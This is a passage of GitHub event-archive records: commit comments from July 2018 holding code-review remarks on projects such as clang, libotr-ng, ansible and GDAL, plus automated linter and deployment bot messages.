{"id":"8044753028","type":"CommitCommentEvent","actor":{"login":"fletcherist"},"repo":{"name":"Yavanosta/yandex-dialogs-sdk"},"payload":{"comment":{"id":29905997,"position":34,"line":18,"path":"src/index.ts","commit_id":"b455e56ad38d992159d7b4ee547d7529e98e1cd6","created_at":"2018-07-31T15:10:21Z","updated_at":"2018-07-31T15:10:21Z","author_association":"NONE","body":"`sesstionMiddleware` misspelling name"}},"created_at":"2018-07-31T15:10:21Z"}
{"id":"8044753838","type":"CommitCommentEvent","actor":{"login":"tanchen2018"},"repo":{"name":"tanchen2018/21121212"},"payload":{"comment":{"id":29906001,"position":null,"line":null,"path":null,"commit_id":"66c9aadf7ca5a831d74ec53ed047bf25a23c702c","created_at":"2018-07-31T15:10:28Z","updated_at":"2018-07-31T15:10:28Z","author_association":"OWNER","body":"喂喂喂二无"}},"created_at":"2018-07-31T15:10:28Z"}
{"id":"8044754945","type":"CommitCommentEvent","actor":{"login":"tanchen2018"},"repo":{"name":"tanchen2018/21121212"},"payload":{"comment":{"id":29906003,"position":null,"line":null,"path":null,"commit_id":"66c9aadf7ca5a831d74ec53ed047bf25a23c702c","created_at":"2018-07-31T15:10:38Z","updated_at":"2018-07-31T15:10:38Z","author_association":"OWNER","body":"乔沃维奇无群无"}},"created_at":"2018-07-31T15:10:38Z"}
{"id":"8044757198","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29906009,"position":54,"line":53,"path":"src/otrng_mackey.c","commit_id":"0eca8661fc27c062989cf7e28c9cb2ef2a83ab09","created_at":"2018-07-31T15:10:59Z","updated_at":"2018-07-31T15:10:59Z","author_association":"MEMBER","body":"why is this called 'shake_256_kdf1'? why the 1?"}},"created_at":"2018-07-31T15:10:59Z"}
{"id":"8044759178","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29906017,"position":352,"line":352,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T15:11:17Z","updated_at":"2018-07-31T15:11:17Z","author_association":"NONE","body":"Redundant new line."}},"created_at":"2018-07-31T15:11:17Z"}
{"id":"8044763081","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-tur"},"payload":{"comment":{"id":29906027,"position":164,"line":19714,"path":"apertium-tur.tur.lexc","commit_id":"f4fac2f52850418468736b425d3a0b62f9575153","created_at":"2018-07-31T15:11:52Z","updated_at":"2018-07-31T15:11:52Z","author_association":"COLLABORATOR","body":"\"sen bana lazımsın\"?"}},"created_at":"2018-07-31T15:11:52Z"}
{"id":"8044769072","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29906042,"position":35,"line":34,"path":"src/otrng_mackey.c","commit_id":"0eca8661fc27c062989cf7e28c9cb2ef2a83ab09","created_at":"2018-07-31T15:12:46Z","updated_at":"2018-07-31T15:12:46Z","author_association":"MEMBER","body":"what if len is zero?"}},"created_at":"2018-07-31T15:12:46Z"}
{"id":"8044769389","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-tur"},"payload":{"comment":{"id":29906043,"position":282,"line":19827,"path":"apertium-tur.tur.lexc","commit_id":"f4fac2f52850418468736b425d3a0b62f9575153","created_at":"2018-07-31T15:12:49Z","updated_at":"2018-07-31T15:12:49Z","author_association":"COLLABORATOR","body":"\"tcye göre biz yasadışıyız\"? "}},"created_at":"2018-07-31T15:12:49Z"}
{"id":"8044773631","type":"CommitCommentEvent","actor":{"login":"joelwallis"},"repo":{"name":"rabbitsch/node-blog-app"},"payload":{"comment":{"id":29906050,"position":17,"line":17,"path":"server.js","commit_id":"64a025d8153fc5e4802553903d5e40fdf7483f30","created_at":"2018-07-31T15:13:29Z","updated_at":"2018-07-31T15:13:29Z","author_association":"NONE","body":"This line _mounts_ `blogPostRouter` into the `/blog-posts` route on your Express app. 🙂\r\n\r\nYou might want to read the [Routing](https://expressjs.com/en/guide/routing.html) guide on the Express website. It talks about how routing works in Express and how you can leverage it by using `express.Router` instances (like the blogPostRouter you've just created)."}},"created_at":"2018-07-31T15:13:29Z"}
{"id":"8044774936","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29906053,"position":26,"line":20,"path":"src/otrng_mackey.c","commit_id":"e2c97b02147452e0e5cb19af6413674aacc37921","created_at":"2018-07-31T15:13:41Z","updated_at":"2018-07-31T15:13:41Z","author_association":"MEMBER","body":"why size and not len?"}},"created_at":"2018-07-31T15:13:41Z"}
{"id":"8044780502","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29906069,"position":440,"line":440,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T15:14:33Z","updated_at":"2018-07-31T15:14:33Z","author_association":"NONE","body":"Is this actually true? I think a PSet could also contain other Pointers."}},"created_at":"2018-07-31T15:14:33Z"}
{"id":"8044781261","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29906071,"position":55,"line":38,"path":"src/otrng_mackey.c","commit_id":"e2c97b02147452e0e5cb19af6413674aacc37921","created_at":"2018-07-31T15:14:40Z","updated_at":"2018-07-31T15:14:40Z","author_association":"MEMBER","body":"This looks very iffy. Is this tested? What happens if malloc fails?"}},"created_at":"2018-07-31T15:14:40Z"}
{"id":"8044782812","type":"CommitCommentEvent","actor":{"login":"fildunsky"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29906075,"position":null,"line":null,"path":null,"commit_id":"3dd73de76669892f9c4a11536fd0363f55ff7a99","created_at":"2018-07-31T15:14:55Z","updated_at":"2018-07-31T15:14:55Z","author_association":"MEMBER","body":"A little bit more in the Wallet (Could we move `Balances` header a bit up so it will be in one line with refresh?)\r\n\r\n![suggest3](https://user-images.githubusercontent.com/32987666/43468764-71c7bee6-94ed-11e8-9d73-116fa150ea0a.png)"}},"created_at":"2018-07-31T15:14:55Z"}
{"id":"8044784062","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29906079,"position":null,"line":null,"path":null,"commit_id":"280665dea768857a9e6995eb9e5411f6fe865a62","created_at":"2018-07-31T15:15:07Z","updated_at":"2018-07-31T15:15:07Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-105](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-105).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-105-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-31T15:15:07Z"}
{"id":"8044785086","type":"CommitCommentEvent","actor":{"login":"richelbilderbeek"},"repo":{"name":"richelbilderbeek/DAISIE"},"payload":{"comment":{"id":29906081,"position":null,"line":null,"path":null,"commit_id":"2e8a41431c97263a41978bb4a8af6290cb67e48a","created_at":"2018-07-31T15:15:16Z","updated_at":"2018-07-31T15:15:16Z","author_association":"OWNER","body":"@Neves-P : Awesome! Thanks for taking the effort to do so :+1: "}},"created_at":"2018-07-31T15:15:16Z"}
{"id":"8044786050","type":"CommitCommentEvent","actor":{"login":"PMassicotte"},"repo":{"name":"PMassicotte/gtrendsR"},"payload":{"comment":{"id":29906084,"position":null,"line":null,"path":null,"commit_id":"a7bfdd3558bf91d78361d38924e4c569910ae78b","created_at":"2018-07-31T15:15:24Z","updated_at":"2018-07-31T15:15:24Z","author_association":"OWNER","body":"I'm an not sure why all the document is red. Hard to identify changes."}},"created_at":"2018-07-31T15:15:24Z"}
{"id":"8044795895","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29906109,"position":635,"line":635,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T15:16:53Z","updated_at":"2018-07-31T15:16:53Z","author_association":"NONE","body":"I think the PSet should be able to contain pointers too. "}},"created_at":"2018-07-31T15:16:53Z"}
{"id":"8044797546","type":"CommitCommentEvent","actor":{"login":"bsdjhb"},"repo":{"name":"CTSRD-CHERI/cheribsd"},"payload":{"comment":{"id":29906114,"position":18,"line":324,"path":"sys/kern/kern_sig.c","commit_id":"3cb1d9235d12a962d8888e8bae010485fd247d9a","created_at":"2018-07-31T15:17:10Z","updated_at":"2018-07-31T15:17:10Z","author_association":"NONE","body":"For ptrace() we don't want these two capabilities tagged since they are going to be copied out to the debugger's address space.  I believe this still leaves them tagged?"}},"created_at":"2018-07-31T15:17:10Z"}
{"id":"8044799518","type":"CommitCommentEvent","actor":{"login":"Neves-P"},"repo":{"name":"richelbilderbeek/DAISIE"},"payload":{"comment":{"id":29906121,"position":null,"line":null,"path":null,"commit_id":"b02aa74149c2acf1405c745b6f7230b7483fc2bc","created_at":"2018-07-31T15:17:27Z","updated_at":"2018-07-31T15:17:27Z","author_association":"COLLABORATOR","body":"Hi @richelbilderbeek \r\n\r\nThanks a bunch for noticing and for the great tip! :+1: It should pass the tests  (I hope) with ggplot2 now\r\n\r\nCheers!"}},"created_at":"2018-07-31T15:17:27Z"}
{"id":"8044802841","type":"CommitCommentEvent","actor":{"login":"harshavardhana"},"repo":{"name":"minio/minio"},"payload":{"comment":{"id":29906124,"position":4,"line":1171,"path":"cmd/gateway/azure/gateway-azure.go","commit_id":"ca2b996936e157fc47500544a2880d44fdf02041","created_at":"2018-07-31T15:17:59Z","updated_at":"2018-07-31T15:17:59Z","author_association":"MEMBER","body":"Once you have - implemented gateway unsupported you don't need to define it again for each gateway."}},"created_at":"2018-07-31T15:17:59Z"}
{"id":"8044804318","type":"CommitCommentEvent","actor":{"login":"deniscostadsc"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29906130,"position":4,"line":47,"path":".travis.yml","commit_id":"dbb07ca31676049606603a10aae4b1ccfbe64cf3","created_at":"2018-07-31T15:18:13Z","updated_at":"2018-07-31T15:18:13Z","author_association":"CONTRIBUTOR","body":"Isn't important to check if the commands are installable/uninstallable?"}},"created_at":"2018-07-31T15:18:13Z"}
{"id":"8044805168","type":"CommitCommentEvent","actor":{"login":"ederst"},"repo":{"name":"ansible/ansible"},"payload":{"comment":{"id":29906132,"position":22,"line":97,"path":"lib/ansible/modules/cloud/openstack/os_server_action.py","commit_id":"89ce826a9fb53c304238923a73667ab820711338","created_at":"2018-07-31T15:18:21Z","updated_at":"2018-07-31T15:18:21Z","author_association":"NONE","body":"I think this broke waiting for an `action` to happen (for example shut down: #42408)\r\n\r\nProbably shoud be `sdk.utils.iterate_timeout( ...`."}},"created_at":"2018-07-31T15:18:21Z"}
{"id":"8044805720","type":"CommitCommentEvent","actor":{"login":"gitmate-bot"},"repo":{"name":"coala/coala-quickstart"},"payload":{"comment":{"id":29906135,"position":null,"line":null,"path":null,"commit_id":"9dadffe44f606f0691f14cb9df3236284847145a","created_at":"2018-07-31T15:18:26Z","updated_at":"2018-07-31T15:18:26Z","author_association":"NONE","body":"Comment on 9dadffe44f606f0691f14cb9df3236284847145a.\n\nThere are 19 results for the section all.autopep8. They have been shortened and will not be shown inline because they are more than 10.\n\n| Message | File | Line |\n|---|---|---|\n| The code does not comply to PEP8. | coala_quickstart/generation/Settings.py | 55 |\n| The code does not comply to PEP8. | coala_quickstart/generation/Settings.py | 59 |\n| The code does not comply to PEP8. | coala_quickstart/generation/Settings.py | 65 |\n| The code does not comply to PEP8. | coala_quickstart/generation/Settings.py | 69 |\n| E305 expected 2 blank lines after class or function definition, found 1 | coala_quickstart/generation/Settings.py | 55 |\n| E227 missing whitespace around bitwise or shift operator | coala_quickstart/generation/Settings.py | 55 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 55 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 56 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 56 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 56 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 59 |\n| E113 unexpected indentation | coala_quickstart/generation/Settings.py | 60 |\n| E227 missing whitespace around bitwise or shift operator | coala_quickstart/generation/Settings.py | 65 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 65 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 66 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 66 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 66 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 69 |\n| E113 unexpected indentation | coala_quickstart/generation/Settings.py | 70 |\n\nUntil GitMate provides an online UI to show a better overview, you can run [coala](https://coala.io/) locally for more details."}},"created_at":"2018-07-31T15:18:26Z"}
{"id":"8044846097","type":"CommitCommentEvent","actor":{"login":"erez9901"},"repo":{"name":"erez9901/Switch-V2.0"},"payload":{"comment":{"id":29906228,"position":null,"line":null,"path":null,"commit_id":"e750f8da9a08eb0b7591d504d9444e127e72f7b5","created_at":"2018-07-31T15:24:47Z","updated_at":"2018-07-31T15:24:47Z","author_association":"OWNER","body":"Nice 👍"}},"created_at":"2018-07-31T15:24:47Z"}
{"id":"8044846190","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29906229,"position":757,"line":757,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T15:24:48Z","updated_at":"2018-07-31T15:24:48Z","author_association":"NONE","body":"`CXXD` could be moved down closer to its use."}},"created_at":"2018-07-31T15:24:48Z"}
{"id":"8044854109","type":"CommitCommentEvent","actor":{"login":"eddelbuettel"},"repo":{"name":"PMassicotte/gtrendsR"},"payload":{"comment":{"id":29906255,"position":null,"line":null,"path":null,"commit_id":"a7bfdd3558bf91d78361d38924e4c569910ae78b","created_at":"2018-07-31T15:25:58Z","updated_at":"2018-07-31T15:25:58Z","author_association":"COLLABORATOR","body":"Could just be whitespace, and I think there was an option for controling the display here but I forget where..."}},"created_at":"2018-07-31T15:25:58Z"}
{"id":"8044858191","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29906264,"position":774,"line":774,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T15:26:37Z","updated_at":"2018-07-31T15:26:37Z","author_association":"NONE","body":"`getParamDecl` does not work for `this`? That is unfortunate. In that case I think I would move the fetching of parameter type into a separate function so this one become smaller."}},"created_at":"2018-07-31T15:26:37Z"}
{"id":"8044858521","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29906266,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T15:26:40Z","updated_at":"2018-07-31T15:26:40Z","author_association":"CONTRIBUTOR","body":"I can understand this point of view.  When I write plugins or new screens the only why to get .po files is to build the image. This script allows the creation of .po files on your local git (pushable to github) without needing to build the image."}},"created_at":"2018-07-31T15:26:40Z"}
{"id":"8044860325","type":"CommitCommentEvent","actor":{"login":"RonaldCarter"},"repo":{"name":"RonaldCarter/PHPManager"},"payload":{"comment":{"id":29906269,"position":5,"line":13,"path":"Client/PHPManagerClient.csproj","commit_id":"1e7c22cff42461a0048a4ef898c394ab82a2a968","created_at":"2018-07-31T15:26:57Z","updated_at":"2018-07-31T15:26:57Z","author_association":"OWNER","body":"This project is aimed at Windows Server 2016. With that said I like the idea of more supported operating systems. I will check doing .NET framework v2 as I don't use any of the newer functions but will have to test in Server 2016, Or is bundling the installer and setting it to install if not available better?"}},"created_at":"2018-07-31T15:26:57Z"}
{"id":"8044860821","type":"CommitCommentEvent","actor":{"login":"m4nt4s"},"repo":{"name":"honey-comb/regions"},"payload":{"comment":{"id":29906272,"position":5,"line":93,"path":"src/database/seeds/HCCountrySeeder.php","commit_id":"36f9a3f24e6bc0bacc1b1a828ade32cc31e032e3","created_at":"2018-07-31T15:27:01Z","updated_at":"2018-07-31T15:27:01Z","author_association":"MEMBER","body":"@darslu  you mustn't hardcode this value. You should get it through filesystem config. `config('filesystems.default')` "}},"created_at":"2018-07-31T15:27:01Z"}
{"id":"8044861436","type":"CommitCommentEvent","actor":{"login":"delarosatrevin"},"repo":{"name":"scipion-em/scipion-em-xmipp3"},"payload":{"comment":{"id":29906274,"position":6,"line":86,"path":"xmipp3/__init__.py","commit_id":"d15e05e0633df8238ed8c5b6ee21dafda4c7957e","created_at":"2018-07-31T15:27:07Z","updated_at":"2018-07-31T15:27:07Z","author_association":"CONTRIBUTOR","body":"I have renamed this function to \"defineBinaries\" to make it more consistent with other existing functions and remove the Plugin from the method name, since it is already inside the Plugin class."}},"created_at":"2018-07-31T15:27:07Z"}
{"id":"8044867426","type":"CommitCommentEvent","actor":{"login":"xysun"},"repo":{"name":"xysun/ray-tracing-in-one-weekend-python"},"payload":{"comment":{"id":29906285,"position":null,"line":null,"path":null,"commit_id":"c4a80caefe6fefacb2f1fe73adf57892f51c6a7e","created_at":"2018-07-31T15:28:01Z","updated_at":"2018-07-31T15:28:01Z","author_association":"OWNER","body":"Hi @SYK2 \r\n\r\nThis is the equation to detect whether the ray has hit the surface of the sphere. \r\n\r\nThe ray position is parameterised by the function `P(t) = A + B*t` where `t` denotes time. \r\n\r\nWhen a ray hits a sphere, the distance between sphere's centre and the contact point is exactly the sphere's radius. This equation is doing exactly that and solve for `t`. \r\n\r\nDistance is calculated by `(P-C) dot (P-C)`, this is in vector form, you can think of it in another way: \r\n\r\nlet's say `P`'s coordinate is `(x1, y1)`, and `C`'s coordinate is `(x2, y2)`, the squared distance between the two points is: `(x1-x2)**2 + (y1-y2)**2`, which should equal to radius squared. "}},"created_at":"2018-07-31T15:28:01Z"}
{"id":"8044867829","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29906286,"position":null,"line":null,"path":null,"commit_id":"98d284ab65b9c9b11513ab11ccf2a3a6079d91d0","created_at":"2018-07-31T15:28:05Z","updated_at":"2018-07-31T15:28:05Z","author_association":"COLLABORATOR","body":"My guess is going to be that the array is (1000, 1, 2, 256, 256) with dimensions of time, channels, polarizations, image x, image y.\r\n\r\nCan we push the FFT to the other side of the accumulation?  So instead of\r\n\r\n  grid->FFT->multiply->accumulate\r\n\r\nswitch over to\r\n\r\n  grid->multiple->accumulate->FFT\r\n\r\n?"}},"created_at":"2018-07-31T15:28:05Z"}
{"id":"8044876726","type":"CommitCommentEvent","actor":{"login":"rouault"},"repo":{"name":"OSGeo/gdal"},"payload":{"comment":{"id":29906307,"position":null,"line":null,"path":null,"commit_id":"730ac94eda1a32c89c1534db8cb4255b818da9b0","created_at":"2018-07-31T15:29:27Z","updated_at":"2018-07-31T15:29:27Z","author_association":"MEMBER","body":"@drons FYI. Issue can be reproduced with attached dataset and GDAL compiled with USER_DEFS=-DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION (at least gcore/*.cpp and frmts/jpeg/*.cpp)\r\n[clusterfuzz-testcase-minimized-gdal_fuzzer-5679329223639040.zip](https://github.com/OSGeo/gdal/files/2245975/clusterfuzz-testcase-minimized-gdal_fuzzer-5679329223639040.zip)\r\n"}},"created_at":"2018-07-31T15:29:27Z"}
{"id":"8044876750","type":"CommitCommentEvent","actor":{"login":"m431m"},"repo":{"name":"EnviDat/ckanext-restricted"},"payload":{"comment":{"id":29906308,"position":null,"line":null,"path":null,"commit_id":"cc75a30d9908b7de2d267b0794310ca2e981f626","created_at":"2018-07-31T15:29:28Z","updated_at":"2018-07-31T15:29:28Z","author_association":"CONTRIBUTOR","body":"oops... delete this line please ><"}},"created_at":"2018-07-31T15:29:28Z"}
{"id":"8044880719","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29906319,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-31T15:30:04Z","updated_at":"2018-07-31T15:30:04Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T15:30:04Z"}
{"id":"8044883604","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29906325,"position":null,"line":null,"path":null,"commit_id":"9434908f43bfe4e3ad466be85e2e115990b32a2f","created_at":"2018-07-31T15:30:31Z","updated_at":"2018-07-31T15:30:31Z","author_association":"CONTRIBUTOR","body":"> These commits are directly related to this wrong filling of castspell with a target. Whats worse, you can look at FillTargetMap, that function is the epitome of the lack of understanding of targeting.\r\n\r\nTrue, there are some errors in this function and not only in the logic of targets eligibility but also in the ways some areas are calculated (front/back/cone target are probably wrong, at least in Classic as they use whole angle instead of half angle).\r\n\r\n> When I am looking at scripts, I always review how the spells are cast in packets, and sometimes I do these adjustment. \r\n\r\nI think we should avoid to make generic rules based on spells used in scripts. These are usually, well. scripted because they don't fit into common rules and it would make no sense to change the whole system to fit in a handful of spells.\r\n\r\nOverall, I have the feeling that you are fixing the whole targeting issue by doing patch fixes here and there instead of having a global and continuous approach. Though they are valid, this makes your changes on the matter harder to follow/understand and thus to provide feedback or review as we don't have the global context. :smiley: "}},"created_at":"2018-07-31T15:30:31Z"}
{"id":"8044888655","type":"CommitCommentEvent","actor":{"login":"lrdgtri"},"repo":{"name":"lrdgtri/NIEM.github.io"},"payload":{"comment":{"id":29906341,"position":null,"line":null,"path":null,"commit_id":"ed730e7aecef8b3be2364c90a7f7d6e15a6f4295","created_at":"2018-07-31T15:31:16Z","updated_at":"2018-07-31T15:31:16Z","author_association":"OWNER","body":"This should really be linked to issue #140. Wrong number used for issue branch."}},"created_at":"2018-07-31T15:31:16Z"}
{"id":"8044892614","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29906348,"position":null,"line":null,"path":null,"commit_id":"c82a12721ad26a5544e8bcb9ae4666ef9ad85e43","created_at":"2018-07-31T15:31:50Z","updated_at":"2018-07-31T15:31:50Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-167](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-167).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-167-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-31T15:31:50Z"}
{"id":"8044895417","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29906358,"position":null,"line":null,"path":null,"commit_id":"1ac9d9ac355620de56ab98f1c8d7617718d5a696","created_at":"2018-07-31T15:32:16Z","updated_at":"2018-07-31T15:32:16Z","author_association":"NONE","body":"[R/combinerenVerschilscore.R:35:6:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/combinerenVerschilscore.R#L35) *warning:* **local variable '%max%' assigned but may not be used**\n```r\n<U+200B>    `%max%` <- function(a, b) max(a, b)\n     ^~~~~\n```\n[R/combinerenVerschilscore.R:36:6:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/combinerenVerschilscore.R#L36) *warning:* **local variable '%min%' assigned but may not be used**\n```r\n<U+200B>    `%min%` <- function(a, b) min(a, b)\n     ^~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:120:1:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/invoercontroleData_soortenKenmerken.R#L120) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:63:1:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/invoercontroleData_voorwaarden.R#L63) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:64:1:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/invoercontroleData_voorwaarden.R#L64) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekkingLaag.R:28:1:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/s4_bedekkingLaag.R#L28) *style:* **Trailing whitespace is 